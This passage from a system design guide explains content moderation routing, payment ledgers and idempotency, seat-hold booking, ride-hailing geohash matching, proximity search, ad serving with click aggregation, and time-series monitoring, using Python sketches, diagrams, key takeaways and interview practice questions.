review_at: float # score above this: send to humans
severity: int # drives queue priority
POLICIES = [
Policy("csam", 0.50, 0.30, severity=100), # low threshold on purpose:
Policy("violence", 0.95, 0.70, severity=80), # false positives are far
Policy("nudity", 0.92, 0.60, severity=40), # cheaper than misses here
Policy("spam", 0.98, 0.85, severity=10), # opposite trade-off
]
def route(scores: dict[str, float], reach: int) -> dict:
for p in sorted(POLICIES, key=lambda x: -x.severity):
s = scores.get(p.category, 0.0)
if s >= p.auto_remove_at:
return {"action": "remove", "category": p.category,
"appealable": True, "audit": {"score": s, "auto": True}}
if s >= p.review_at:
# Priority mixes severity with exposure: a borderline item seen by
# 2M people outranks a worse item nobody has seen.
priority = p.severity * (1 + min(reach, 1_000_000) / 100_000)
return {"action": "queue_review", "category": p.category,
"priority": round(priority, 1),
"visibility": "restricted" if p.severity >= 50 else "normal"}
return {"action": "allow"}
print(route({"nudity": 0.65, "spam": 0.20}, reach=2_000_000))
# {'action': 'queue_review', 'category': 'nudity', 'priority': 440.0,
# 'visibility': 'restricted'}
Thresholds encode policy, not accuracy. The same classifier is deployed at different operating points per category because the cost asymmetry differs: for the most severe categories a false positive (removing legitimate content) is far cheaper than a false negative, so thresholds are low and appeals matter; for spam the reverse holds. Making this explicit in configuration — rather than burying it in a model — is what lets policy change without retraining.
Human review is a system, not a step. It needs prioritized queues, reviewer tooling that shows only what is necessary (with blurring and rotation limits for wellbeing), inter-rater agreement sampling to measure quality, and a feedback loop that turns decisions into labelled training data. Reviewer capacity is the binding constraint, so anything that reduces queue volume without reducing safety — better thresholds, deduplication by content hash, batching identical items — has outsized value.
Appeals and auditability close the loop and are increasingly a regulatory requirement: every automated action needs a recorded reason, a notification, an appeal path, and a retention policy for the evidence. Adversarial adaptation is constant — obfuscated text, cropped or re-encoded images, coded language — so the pipeline needs perceptual hashing rather than exact hashing, continuous evaluation on fresh samples, and the drift monitoring of 14.4.6 pointed at the classifiers.
Key Takeaways
- Tier the pipeline: deterministic hash matching, then classifiers, then humans, in increasing cost order.
- Thresholds encode policy and cost asymmetry per category — keep them in configuration, not in the model.
- Prioritize the human queue by severity times reach, not by arrival order.
- Human reviewers are the binding constraint: deduplicate, batch, and tune thresholds to protect their capacity.
- Feed human decisions back as labelled training data.
- Appeals, notification, and audit trails are requirements, not extras.
- Adversaries adapt: use perceptual hashing and monitor classifiers for drift.
🧪 Practice
- Set thresholds for three categories with different cost asymmetries, and justify each operating point.
- Design the review queue's priority function and show how it orders four example items with differing severity and reach.
- Interview: Your classifier flags 5% of uploads for review, which is ten times your reviewer capacity. What do you do? (Hint: think about which dimension of the funnel you can move — the threshold, the queue, or what happens to items while they wait.)
<a id="154-transactional-and-real-time-systems"></a>
15.4 Transactional and Real-Time Systems
These systems share a property the previous ones did not: being wrong costs money or safety, not just engagement. Double-charging a card, selling the same seat twice, or dispatching two drivers to one rider are failures no amount of eventual consistency excuses — so this subchapter is largely about where to spend the expensive coordination, and how to stay correct under retries, partitions, and extreme write concentration.
Design a Payment System
Payments are the canonical correctness-critical system: money must not be created or destroyed, a customer must not be charged twice, and every state change must be explainable months later during a dispute. The complication is that the authoritative action happens in someone else's system — a card network or bank that can time out ambiguously, leaving you unsure whether the charge succeeded. The design is therefore built around idempotency, explicit state machines, and reconciliation.
Requirements. Charge a customer via a payment provider; support refunds and partial refunds; handle asynchronous webhook confirmations; maintain an auditable ledger; reconcile against provider settlement reports; never double-charge, even under client retries and network failures.
The ledger is the source of truth, not the account balance. Double-entry bookkeeping makes correctness a checkable invariant rather than a hope: every transaction writes balanced entries whose sum is zero, and a balance is derived by summing entries rather than being mutated in place. A mutated balance can be wrong silently; an unbalanced ledger cannot.
DOUBLE-ENTRY LEDGER: charge a customer 100.00, of which 3.20 is fee
transaction_id account debit credit
txn_9001 customer_receivable 100.00
txn_9001 merchant_payable 96.80
txn_9001 platform_revenue_fees 3.20
------- -------
100.00 100.00 <- MUST balance
Entries are IMMUTABLE and append-only. A refund is a NEW transaction with the
opposite entries, never an edit or a delete of the original. This is what makes
history reconstructible and audits possible.
from dataclasses import dataclass
from decimal import Decimal # NEVER float: 0.1 + 0.2 != 0.3 in binary
from enum import Enum
class PaymentState(Enum):
CREATED = "created"
AUTHORIZING = "authorizing" # provider call in flight: outcome UNKNOWN
AUTHORIZED = "authorized"
CAPTURED = "captured"
FAILED = "failed"
REFUNDED = "refunded"
# Explicit transitions: anything not listed is a bug, and the state machine
# rejects it rather than silently corrupting the record.
ALLOWED = {
PaymentState.CREATED: {PaymentState.AUTHORIZING},
PaymentState.AUTHORIZING: {PaymentState.AUTHORIZED, PaymentState.FAILED},
PaymentState.AUTHORIZED: {PaymentState.CAPTURED, PaymentState.FAILED},
PaymentState.CAPTURED: {PaymentState.REFUNDED},
PaymentState.FAILED: set(),
PaymentState.REFUNDED: set(),
}
class PaymentService:
def charge(self, idempotency_key: str, customer: str,
amount: Decimal, currency: str) -> dict:
# 1. IDEMPOTENCY: the client retries on timeout with the SAME key.
# Store the key with the request fingerprint BEFORE calling out.
existing = self.db.get_by_key(idempotency_key)
if existing:
if existing["fingerprint"] != self._fp(customer, amount, currency):
raise ValueError("idempotency key reused with different params")
return existing # replay the original outcome, do not charge
payment = self.db.create(idempotency_key=idempotency_key,
fingerprint=self._fp(customer, amount, currency),
state=PaymentState.CREATED, amount=amount)
# 2. Record the ATTEMPT before the external call. If we crash here, the
# row exists in AUTHORIZING and reconciliation resolves it later.
self.db.transition(payment.id, PaymentState.AUTHORIZING)
try:
result = self.provider.authorize(
customer, amount, currency,
idempotency_key=idempotency_key) # providers honour this too
except TimeoutError:
# 3. AMBIGUOUS: the charge may have succeeded. Do NOT retry blindly
# and do NOT mark failed — leave it pending for reconciliation.
self.db.mark_needs_reconciliation(payment.id)
return {"state": "pending", "payment_id": payment.id}
state = (PaymentState.AUTHORIZED if result.approved
else PaymentState.FAILED)
self.db.transition(payment.id, state)
if state is PaymentState.AUTHORIZED:
self.ledger.post(payment.id, entries=self._entries(payment))
return {"state": state.value, "payment_id": payment.id}
Ambiguous failures are the defining problem. A timeout means the outcome is unknown, not that it failed — the money may already have moved. Three mechanisms resolve it together: an idempotency key that both you and the provider honour so a retry cannot double-charge; a pending state that is never guessed into success or failure; and a reconciliation job that compares your ledger against the provider's settlement report daily and flags every discrepancy for investigation. Reconciliation is not optional cleanup — it is the control that proves the system is correct.
Webhooks carry the asynchronous outcomes (capture confirmed, dispute opened, payout settled). They arrive out of order, more than once, and occasionally not at all, so handlers must verify the signature, be idempotent on the event ID, ignore events older than the current state, and be backed by a polling fallback for the ones that never arrive.
Two further requirements shape the schema. Money is never a float — use integer minor units or a decimal type, and store the currency alongside every amount, because a bare number is meaningless. And compliance is structural: card data should never touch your servers (use provider tokenization to stay out of PCI scope), while audit trails, retention rules, and access controls follow from 11.x rather than being added later.
Key Takeaways
- The double-entry ledger is the source of truth; balances are derived, and entries are immutable and append-only.
- Idempotency keys, honoured end to end, are what make client retries safe.
- Timeouts are ambiguous: never guess the outcome — record pending and resolve by reconciliation.
- Model payment lifecycle as an explicit state machine that rejects illegal transitions.
- Webhooks are duplicated, out of order, and occasionally lost: verify, deduplicate, and poll as a fallback.
- Store money as integers or decimals with an explicit currency, never floats.
- Tokenize card data so it never enters your systems.
🧪 Practice
- Write the ledger entries for a 100.00 charge with a 2.9% + 0.30 fee, then for a 40.00 partial refund of it.
- Design the reconciliation job: inputs, comparison keys, and the categories of discrepancy it must report.
- Interview: Your service times out calling the payment provider. What do you do? (Hint: enumerate the states the world could actually be in, and pick the action that is safe in all of them.)
Design a Ticket Booking System
Selling assigned seats is a scarce-inventory problem with an ugly traffic profile: demand is near zero until a sale opens, then a hundred thousand people try to buy a few thousand seats within seconds. Overselling is unacceptable, but so is locking inventory so conservatively that the system serializes and nobody can buy anything. The design is about holding scarce resources briefly and correctly under extreme contention.
Requirements. Browse events and seat availability; hold selected seats for a short window while the user pays; confirm the booking on payment; release abandoned holds automatically; never sell one seat twice. Non-functional: survive a 1000x traffic spike at sale opening and keep the purchase path correct even if the browse path degrades.
Estimates. A 50,000-seat venue with 500,000 people attempting to buy means the system must reject or queue 90% of arrivals — which reframes the problem: the dominant design goal is admission control, not throughput. The seat inventory itself is tiny (50,000 rows) and fits comfortably in one database, so the temptation to distribute it should be resisted; a single partition per event is what makes the correctness argument simple.
BOOKING FLOW
user --> [ virtual waiting room ] <- admission control: only N users per
| queue position, second reach the seat map, which keeps
| estimated wait the inventory service inside its
v concurrency limits
[ seat map (cached, slightly stale — fine for BROWSING) ]
|
v select seats
[ HOLD: conditional write, 10-minute TTL ] <- the only strongly
| success -> proceed to payment consistent step
| conflict -> "seats just taken", re-render
v
[ payment (15.4.1) ]
| success -> CONFIRM: hold -> booked, issue tickets
| failure/timeout -> hold expires -> seats return automatically
v
[ booking record + ticket delivery ]
import time
from datetime import datetime, timedelta
HOLD_SECONDS = 600
class SeatInventory:
"""Seat state lives in ONE partition per event so a multi-seat hold is a
single-partition transaction. This is the whole correctness argument."""
def hold(self, event_id: str, seat_ids: list[str], user_id: str) -> dict:
now = datetime.utcnow()
with self.db.transaction() as tx:
rows = tx.select_for_update(
"SELECT seat_id, state, hold_expires_at FROM seats "
"WHERE event_id = %s AND seat_id = ANY(%s)", event_id, seat_ids)
unavailable = [
r["seat_id"] for r in rows
if r["state"] == "booked"
# An expired hold is available again — checked lazily on read
# rather than by a sweeper job, so there is no race with expiry.
or (r["state"] == "held" and r["hold_expires_at"] > now)]
if unavailable:
return {"ok": False, "unavailable": unavailable}
hold_id = self.ids.next_id()
tx.execute(
"UPDATE seats SET state='held', hold_id=%s, held_by=%s, "
"hold_expires_at=%s WHERE event_id=%s AND seat_id = ANY(%s)",
hold_id, user_id, now + timedelta(seconds=HOLD_SECONDS),
event_id, seat_ids)
# All-or-nothing: a partial hold would strand seats and confuse
# the user. The transaction gives us that for free.
return {"ok": True, "hold_id": hold_id,
"expires_at": now + timedelta(seconds=HOLD_SECONDS)}
def confirm(self, hold_id: str, payment_id: str) -> dict:
with self.db.transaction() as tx:
rows = tx.select_for_update(
"SELECT seat_id FROM seats WHERE hold_id=%s AND state='held' "
"AND hold_expires_at > NOW()", hold_id)
if not rows:
# The hold expired while the user was paying: refund, do not
# book. Taking money for seats you cannot deliver is worse.
return {"ok": False, "reason": "hold_expired", "refund": payment_id}
tx.execute("UPDATE seats SET state='booked', payment_id=%s "
"WHERE hold_id=%s", payment_id, hold_id)
return {"ok": True, "seats": [r["seat_id"] for r in rows]}
Why a hold rather than a lock at payment time. The user needs minutes to enter card details, and holding a database lock for minutes would serialize the entire event. A hold is a short-lived state in the row with an expiry, checked lazily on the next read — no sweeper job, no race between the sweeper and a confirmation. The trade-off is that seats can appear unavailable to others while a user abandons checkout, which is why hold windows are short and clearly communicated.
The waiting room is what actually makes the sale survivable. It is a queue in front of the application that admits users at a rate the inventory service can serve, gives each a position and estimate, and enforces a signed token so nobody can skip it. Without it, every mitigation downstream is fighting a load the system was never sized for.
Consistency trade-offs to state explicitly. Browsing availability can be stale and cached — showing a seat that was taken half a second ago is acceptable because the hold step is authoritative. General-admission events (no assigned seats) reduce to a counter and can use optimistic decrements with a reservation token, which scales far better than row locking. And every downstream integration — payment, ticket delivery, email — must be idempotent, because retries in this system are certain.
Key Takeaways
- Keep an event's inventory in a single partition so holds and confirmations are single-partition transactions.
- Use short TTL holds, not long-lived locks, and check expiry lazily on read.
- Make multi-seat holds all-or-nothing.
- A virtual waiting room is admission control — it is the primary defence against the sale-opening spike.
- Browse paths may be stale and cached; only the hold step needs strong consistency.
- If the hold expires during payment, refund rather than book.
- General admission is a counter problem and scales differently from assigned seating.
🧪 Practice
- Choose a hold duration and justify it against abandonment rate and inventory turnover.
- Design the waiting room token: contents, signature, expiry, and how it stops queue-jumping.
- Interview: 100,000 users try to buy 5,000 seats at 10:00:00 exactly. Walk through what your system does. (Hint: think about what has to happen before any of that traffic reaches the inventory table.)
Design a Ride-Hailing Service
Ride-hailing joins two moving populations in real time: riders who want a car now and drivers whose positions change every few seconds. The system must ingest a continuous stream of location updates, answer "which drivers are near this point" in milliseconds, and — the genuinely hard part — assign each driver to exactly one rider despite many concurrent matching attempts.
Requirements. Drivers publish location continuously; riders request a trip from a pickup point; the system matches a nearby suitable driver; both parties track the trip live; pricing and payment on completion. Non-functional: matching within seconds, location writes at very high volume, and no double-assignment of a driver.
Estimates. 1M active drivers reporting every 4 seconds is 250k location writes/second — a write rate that rules out a conventional indexed table and argues for an in-memory geospatial store with periodic durable snapshots. Trip requests are far rarer (perhaps 5k/s at peak), so reads and matching are cheap compared with ingest.
Geospatial indexing is the enabling technique. Latitude/longitude pairs cannot be range-scanned in two dimensions efficiently, so systems map 2D space onto a 1D key that preserves locality — geohash, S2 cells, or H3 hexagons. Nearby points then share a key prefix, and a proximity query becomes a handful of prefix lookups.
import math
BASE32 = "0123456789bcdefghjkmnpqrstuvwxyz"
def geohash(lat: float, lon: float, precision: int = 7) -> str:
"""Interleave latitude and longitude bits so spatial proximity becomes
string-prefix proximity. Precision 7 is roughly a 150 x 150 m cell."""
lat_r, lon_r = [-90.0, 90.0], [-180.0, 180.0]
bits, bit, ch, out = [], 0, 0, []
even = True
while len(out) < precision:
if even:
mid = sum(lon_r) / 2
if lon > mid: ch = (ch << 1) | 1; lon_r[0] = mid
else: ch = ch << 1; lon_r[1] = mid
else:
mid = sum(lat_r) / 2
if lat > mid: ch = (ch << 1) | 1; lat_r[0] = mid
else: ch = ch << 1; lat_r[1] = mid
even = not even
bit += 1
if bit == 5:
out.append(BASE32[ch]); bit, ch = 0, 0
return "".join(out)
def haversine_km(a: tuple, b: tuple) -> float:
R = 6371.0
dlat, dlon = math.radians(b[0] - a[0]), math.radians(b[1] - a[1])
x = (math.sin(dlat / 2) ** 2
+ math.cos(math.radians(a[0])) * math.cos(math.radians(b[0]))
* math.sin(dlon / 2) ** 2)
return 2 * R * math.asin(math.sqrt(x))
class DriverLocationIndex:
def __init__(self, precision: int = 6): # ~1.2 km cells
self.precision = precision
self.cells: dict[str, dict[str, tuple]] = {}
self.driver_cell: dict[str, str] = {}
def update(self, driver_id: str, lat: float, lon: float) -> None:
cell = geohash(lat, lon, self.precision)
old = self.driver_cell.get(driver_id)
if old and old != cell:
self.cells[old].pop(driver_id, None) # moved to a new cell
self.cells.setdefault(cell, {})[driver_id] = (lat, lon)
self.driver_cell[driver_id] = cell
def nearby(self, lat: float, lon: float, radius_km: float = 3.0):
# Query the cell PLUS its neighbours: a rider near a cell edge would
# otherwise miss the closest driver, sitting just across the boundary.
centre = geohash(lat, lon, self.precision)
candidates = []
for cell in [centre] + self._neighbours(centre):
for did, pos in self.cells.get(cell, {}).items():
d = haversine_km((lat, lon), pos)
if d <= radius_km: # exact filter after prefix
candidates.append((d, did)) # scan
return sorted(candidates)
Matching must guarantee exclusivity. Several riders can be matched
concurrently to the same nearby driver, so the assignment step needs an atomic
compare-and-set on driver state (available -> assigned); losers re-run matching
against the remaining candidates. Batched matching — collecting requests over a
2-3 second window and solving the assignment jointly — produces measurably better
global outcomes than greedy first-come matching, at the cost of a small delay.
MATCHING
request -> [ candidate drivers from geo index: ~20 within 3 km ]
|
v score: ETA (road network, not straight line), rating,
| vehicle class, driver acceptance history
v
[ atomic claim: CAS driver.state available -> assigned ]
| success -> offer to driver, start trip lifecycle
| lost race -> next candidate
v
[ driver declines / times out -> return to pool, offer next ]
Trip state machine: requested -> matched -> accepted -> arriving ->
in_progress -> completed -> paid
Every transition is persisted; a phone dying mid-trip must not lose the trip.
Surge pricing is a control loop, not a pricing feature: it measures the demand/supply ratio per geographic cell over a short window and raises the multiplier to suppress demand and attract drivers. It must be smoothed and capped, because rapid oscillation produces both user outrage and unstable driver behaviour.
The remaining engineering is ordinary but load-bearing: location updates go to an in-memory store with a durable stream behind them (losing the last few seconds of positions is fine; losing trip state is not); ETAs come from a routing service over real road networks rather than straight-line distance; and trip state must be persisted at every transition so an app crash or a dead battery does not lose an in-progress ride.
Key Takeaways
- Map 2D coordinates to 1D locality-preserving keys (geohash, S2, H3) so proximity queries are prefix lookups.
- Always query neighbouring cells — a rider at a cell boundary would otherwise miss the nearest driver.
- Filter candidates by exact distance after the prefix scan.
- Location writes dominate: keep them in memory with a durable stream behind, and accept losing the last few seconds.
- Assignment needs an atomic state transition; batched matching beats greedy matching at a small latency cost.
- Rank by road-network ETA, not straight-line distance.
- Persist every trip state transition; surge pricing must be smoothed and capped.
🧪 Practice
- Choose a geohash precision for a dense city and justify it against expected drivers per cell.
- Design the driver-decline flow, including timeouts and how you avoid offering the same trip repeatedly to unresponsive drivers.
- Interview: Two riders are matched to the same driver simultaneously. How do you prevent it? (Hint: think about what must be atomic, and what the loser of the race should experience.)
Design a Proximity and Geospatial Service
The previous system needed moving points; this one generalizes to the static case — "what is near me?" for restaurants, stores, chargers, or listings. The data changes rarely and is read constantly, which inverts the trade-offs: you can afford heavy precomputation and rich indexes, and the interesting questions become boundary correctness, density skew, and how to combine spatial filtering with everything else the query asks for.
Requirements. Find places within a radius or a viewport, ranked by distance and relevance; filter by attributes (open now, category, rating, price); paginate stably; support tens of thousands of queries per second over tens of millions of places.
Indexing options differ in how they behave under uneven density, which is the defining property of real geographic data — a city block may hold 500 restaurants while a rural cell holds none.
| Structure | Idea | Strength | Weakness |
|---|---|---|---|
| Geohash prefix | Interleaved bits -> string prefix | Simple, works in any KV store | Fixed grid; edge cases |
| Quadtree | Recursive subdivision | Adapts to density | Rebalancing on updates |
| S2 cells | Sphere -> Hilbert curve cells | No pole distortion, ranges | Conceptually heavier |
| H3 hexagons | Hexagonal grid | Uniform neighbour distance | No perfect parent nesting |
| R-tree / PostGIS | Bounding-box tree | Rich queries, polygons | Single-node scaling limits |
For most products the honest answer is PostGIS (or an equivalent spatial index) until it stops scaling, then a cell-based scheme in a distributed store. The migration is easier than starting with the complex option.
class GeoSearchService:
"""Cell-indexed places with an adaptive search radius, so both dense city
centres and sparse rural areas return useful results."""
def search(self, lat: float, lon: float, filters: dict,
limit: int = 20, max_radius_km: float = 40.0):
radius = 1.0
seen: dict[str, tuple] = {}
while radius <= max_radius_km:
# Choose the cell precision from the radius: coarse cells for wide
# searches, fine cells for tight ones. Using one fixed precision
# either scans too much in cities or too little in the countryside.
precision = self._precision_for(radius)
for cell in self._cover(lat, lon, radius, precision):
for place in self.index.get(cell, []):
if place.id in seen:
continue
d = haversine_km((lat, lon), (place.lat, place.lon))
if d <= radius and self._matches(place, filters):
seen[place.id] = (d, place)
if len(seen) >= limit:
break
radius *= 2 # expand only when the tight search came up short
ranked = sorted(seen.values(),
key=lambda dp: self._score(dp[0], dp[1]))
return ranked[:limit]
def _score(self, distance_km: float, place) -> float:
# Pure distance ranking surfaces a bad place next door over an excellent
# one 400 m away. Blend distance with quality and popularity.
return (distance_km * 1.0
- place.rating * 0.15
- min(place.review_count, 500) / 500 * 0.10)
def _matches(self, place, filters: dict) -> bool:
# Attribute filters are applied AFTER the spatial narrowing: the spatial
# index is the selective one, so it should run first.
return all(getattr(place, k, None) == v for k, v in filters.items())
THE BOUNDARY PROBLEM (why single-cell lookup is always wrong)
+--------+--------+ query point Q sits near the right edge of its
| | B | cell. Driver/place B is 80 m away but lives in
| Q --+--> B | the NEIGHBOURING cell. Searching only Q's cell
| | | misses it entirely.
+--------+--------+
Fix: search the covering set of cells that
Always query the covering intersects the query circle, then filter by
set, then filter exactly. exact distance.
Three practical concerns complete the design. Density skew means a fixed precision is wrong everywhere: use adaptive precision (as above) or a structure that subdivides by density. Caching works unusually well here because queries cluster — round the query point to a coarse grid before building the cache key so that nearby users share a cache entry, at the cost of slight ranking imprecision. And stable pagination requires a deterministic sort key including a tiebreaker (distance, then place ID), because floating-point distances tie often enough to reorder pages otherwise.
Key Takeaways
- Spatial indexes map 2D to 1D so proximity becomes a range or prefix query.
- Always search a covering set of cells and then filter by exact distance — single-cell lookup misses near neighbours across boundaries.
- Real geographic density is wildly uneven: use adaptive precision or a density-adaptive structure.
- Apply the spatial filter first — it is the selective one — then attribute filters.
- Rank by a blend of distance and quality; pure distance surfaces bad results.
- Round query points onto a coarse grid for cache keys so nearby users share entries.
- Paginate on a deterministic sort key with an explicit tiebreaker.
🧪 Practice
- Compute how many cells a 5 km radius query must cover at two different geohash precisions, and pick one.
- Design the cache key for proximity search including location rounding, filters, and what TTL you would use.
- Interview: Users in dense city centres get slow responses while rural users get empty ones. Diagnose it. (Hint: one fixed cell size is being asked to serve two very different densities — think about what each case is scanning.)
Design an Ad Serving and Click Aggregation System
Ad systems combine two subsystems with opposite characteristics: serving, which must choose and return an ad within a few tens of milliseconds, and click/impression aggregation, which must count enormous event volumes accurately enough to bill advertisers. The first is a latency problem, the second is a correctness-at-scale problem, and conflating them is the classic design mistake.
Requirements. Serve a relevant ad for a request within a strict latency budget; enforce targeting rules and budget caps; record impressions and clicks; aggregate them into reporting and billing; detect fraudulent traffic. Non-functional: serving p99 under ~50 ms, no material overspend of an advertiser's budget, and counts accurate enough to invoice.
Estimates. 1M ad requests/second at peak with a 1% click-through rate gives 1M impressions/s and 10k clicks/s. At 200 bytes per event that is ~200 MB/s of impression events — far too much to write synchronously to a database, which is why events go to a log and are aggregated by a stream processor (14.2.3).
TWO SUBSYSTEMS, DELIBERATELY SEPARATED
SERVING PATH (must be fast) EVENT PATH (must be accurate)
request impression/click beacon
| targeting: geo, device, |
| segment, context v
v [ append to log: Kafka ]
[ candidate ads from in-memory | |
index, ~50 ms budget ] | +--> raw archive (replayable
| filter: budget remaining, | source of truth)
| frequency cap, brand safety v
v [ stream aggregation: dedupe by event_id,
[ rank by eCPM = bid x pCTR ] windowed counts by campaign/hour ]
| |
v +--> near-real-time budget counters
[ return ad + tracking URLs ] | (fed BACK to the serving path)
+--> billing tables (exactly-once,
reconciled daily)
class AdServer:
BUDGET_SAFETY = 0.95 # stop serving at 95% of budget: counters lag
def serve(self, request) -> dict | None:
# 1. Candidate selection from an in-memory index. Everything on this
# path is precomputed or local — no database call fits the budget.
candidates = self.index.match(
geo=request.geo, device=request.device,
segments=request.user_segments, context=request.page_category)
eligible = []
for ad in candidates:
# 2. Budget check against a CACHED counter. It lags by seconds, so
# the safety margin is what prevents overspend, not precision.
spent = self.budget_cache.get(ad.campaign_id)
if spent >= ad.daily_budget * self.BUDGET_SAFETY:
continue
if self.freq_cap.count(request.user_id, ad.campaign_id) >= ad.cap:
continue
if not self.brand_safety.allows(ad, request.page_category):
continue
eligible.append(ad)
if not eligible:
return None
# 3. Rank by expected value, not raw bid: a high bid on an ad nobody
# clicks is worth less than a modest bid that converts.
for ad in eligible:
ad.ecpm = ad.bid * self.ctr_model.predict(ad, request) * 1000
winner = max(eligible, key=lambda a: a.ecpm)
# 4. Second-price auction: the winner pays just above the runner-up,
# which makes honest bidding the optimal strategy for advertisers.
runner_up = sorted((a.ecpm for a in eligible), reverse=True)
price = (runner_up[1] / 1000 if len(runner_up) > 1 else winner.bid * 0.5)
impression_id = self.ids.next_id()
self.events.emit({"type": "impression", "id": impression_id,
"campaign": winner.campaign_id, "price": price,
"ts": time.time()}) # async, never blocking
return {"ad": winner.creative,
"click_url": self.sign(impression_id, winner.landing_url)}
Counting accurately is the harder half. Events are delivered at least once, arrive late from mobile devices, and include a meaningful volume of fraudulent traffic. The pipeline therefore deduplicates on an event ID, uses event-time windows with watermarks and allowed lateness (14.2.5), keeps the raw log as a replayable source of truth, and treats the streaming counters as fast-but- approximate while a daily batch recomputation produces the billable numbers. That combination — fast approximate counters for pacing, exact recomputation for billing — is the pragmatic resolution of the accuracy/latency tension.
Budget pacing deserves attention because it is where money leaks. Counters that lag by seconds mean a popular campaign can overspend during the lag, so serving stops at a safety threshold below the true budget, and pacing spreads spend across the day rather than exhausting it in the first hour. Fraud detection runs both inline (obvious bot signatures, impossible click timing) and offline (behavioural clustering), with the offline results producing clawbacks — which is another reason billing must be recomputable rather than incremental only.
Key Takeaways
- Separate the latency-critical serving path from the accuracy-critical event pipeline.
- Everything on the serving path must be in memory or precomputed; there is no budget for a database call.
- Rank by expected value (bid x predicted CTR), not raw bid; second-price auctions make honest bidding optimal.
- Budget counters lag, so stop serving below the true cap and pace spend across the day.
- Deduplicate events by ID, use event-time windows with allowed lateness, and keep the raw log replayable.
- Serve reporting from fast approximate counters; bill from a daily exact recomputation.
- Fraud detection is inline plus offline, with clawbacks — so billing must be recomputable.
🧪 Practice
- Compute the daily event volume and storage for 1M impressions/second at 200 bytes per event, with 90-day retention.
- Design the budget-pacing algorithm so a campaign spends evenly across a day instead of exhausting its budget by 09:00.
- Interview: An advertiser says your click count is 8% higher than their landing-page analytics. How do you investigate? (Hint: the two systems are counting different events at different points — enumerate everything that can happen between a click and a page load.)
Design a Metrics and Monitoring System
A monitoring system is the one piece of infrastructure that must keep working while everything else fails, and it must do so while absorbing one of the highest write rates in the company. Its data has a distinctive shape — timestamped numeric series identified by a metric name plus labels — and exploiting that shape is what makes storing billions of points per day affordable.
Requirements. Ingest metrics from thousands of hosts and services; store them with a retention policy; support aggregation queries over arbitrary time ranges and label filters; evaluate alerting rules continuously; render dashboards quickly. Non-functional: ingest must not lose data during bursts, queries over a day of data must return in seconds, and the system must not depend on the systems it monitors.
Estimates. 10,000 hosts x 1,000 series each, scraped every 15 seconds, is ~667k data points per second. Naively at 16 bytes per point that is ~920 GB/day — and this is where the specialized storage earns its place: time-series compression routinely reduces this by 10-20x.
TIME-SERIES COMPRESSION (the reason TSDBs exist)
raw: (t=1693526400, v=42.5) (t=1693526415, v=42.7) (t=1693526430, v=42.6)
16 bytes each
DELTA-OF-DELTA on timestamps: intervals are almost always identical, so the
second difference is almost always ZERO -> a few BITS per point.
1693526400, +15, +0, +0, +0, ...
XOR on values: consecutive float values share most of their bits, so the XOR
is mostly zeros -> store only the differing window.
42.5 ^ 42.7 -> a handful of significant bits
Result: ~1.3 bytes per point instead of 16 (Gorilla-style encoding).
920 GB/day -> ~75 GB/day.
class TimeSeriesIngest:
"""Two-tier storage: recent data in memory for fast queries and alert
evaluation, older data compressed into immutable blocks on disk."""
def __init__(self, block_minutes: int = 120):
self.head: dict[str, list[tuple[int, float]]] = {} # series -> points
self.block_seconds = block_minutes * 60
def series_key(self, name: str, labels: dict[str, str]) -> str:
# Labels are part of the identity: high-cardinality labels (user_id,
# request_id, full URLs) create MILLIONS of series and are the single
# most common way to destroy a metrics system.
label_str = ",".join(f"{k}={v}" for k, v in sorted(labels.items()))
return f"{name}{{{label_str}}}"
def write(self, name: str, labels: dict[str, str], ts: int, value: float):
key = self.series_key(name, labels)
if len(self.head) > 2_000_000 and key not in self.head:
raise MemoryError("series cardinality limit — reject, do not OOM")
self.head.setdefault(key, []).append((ts, value))
def flush_block(self, now: int) -> dict:
"""Seal the head into an immutable, compressed, indexed block."""
cutoff = now - self.block_seconds
block = {k: [p for p in pts if p[0] < cutoff]
for k, pts in self.head.items()}
for k in list(self.head):
self.head[k] = [p for p in self.head[k] if p[0] >= cutoff]
return {"series": len(block),
"points": sum(len(v) for v in block.values())}
def downsample(points: list[tuple[int, float]], interval_s: int):
"""Retention tiering: keep raw data briefly, then roll up. Nobody queries
15-second resolution from six months ago, but they do query the trend."""
buckets: dict[int, list[float]] = {}
for ts, v in points:
buckets.setdefault(ts - ts % interval_s, []).append(v)
return [{"ts": b, "min": min(vs), "max": max(vs),
"avg": sum(vs) / len(vs), "count": len(vs)}
for b, vs in sorted(buckets.items())]
Push versus pull is the classic architectural fork. Pull (Prometheus-style scraping) gives the monitoring system control over rate and an implicit liveness check — a target that cannot be scraped is itself a signal — but needs service discovery and struggles with short-lived jobs and networks it cannot reach. Push (StatsD, OpenTelemetry-style) handles ephemeral jobs and NAT boundaries naturally but lets a misbehaving client flood the system, so it needs its own rate limiting. Most large deployments use pull for infrastructure and push for batch jobs and client-side telemetry.
Cardinality is the defining failure mode. Every distinct label combination is
a separate series, so adding a user_id label to a metric turns one series into
millions, and the system dies of memory rather than of write volume. Defences are
structural: limit labels at the client library, reject high-cardinality writes at
ingest, and monitor series counts as a first-class metric.
Alerting and retention complete the picture. Alert rules evaluate over recent
data on a schedule; they need for durations to avoid flapping, grouping and
deduplication so one incident does not produce 400 pages, and an evaluation path
that does not depend on the long-term store. Retention is tiered: raw resolution
for days, downsampled rollups for months, and aggregated summaries for years. And
the monitoring system must be independently deployed and independently alerted on
— often by a small external watchdog — because a monitoring system that fails
silently is worse than none at all.
Key Takeaways
- Time-series data compresses enormously via delta-of-delta timestamps and XOR values — roughly 1-2 bytes per point.
- Two-tier storage: a recent in-memory head for queries and alerting, immutable compressed blocks for history.
- Label cardinality, not write volume, is what kills metrics systems — limit it at the client and reject it at ingest.
- Pull gives rate control and implicit liveness; push handles ephemeral jobs and NAT; most systems use both.
- Downsample on a retention ladder: raw for days, rollups for months.
- Alerts need
fordurations, grouping, and deduplication to stay actionable.- Monitoring must not depend on what it monitors, and needs an external watchdog of its own.
🧪 Practice
- Compute daily storage for 500k points/second at 16 bytes raw and at 1.3 bytes compressed, then apply a 3-tier retention policy.
- Identify three labels that would explode cardinality in a web service, and propose what to record instead.
- Interview: Your metrics system falls over during an incident — exactly when you need it. What went wrong and how do you prevent it? (Hint: think about what changes in the metric stream during an incident, and which dimension of the data grows fastest.)
<a id="155-communicating-a-design"></a>
15.5 Communicating a Design
A design that nobody understands does not get built, and a design nobody can critique gets built wrong. This subchapter covers the communication half of the discipline — structuring a discussion under time pressure, drawing diagrams that carry information, defending trade-offs honestly, absorbing new constraints mid-conversation, avoiding the failure patterns that reliably sink designs, and writing the document that outlives the meeting.
Interview Framework and Time Allocation
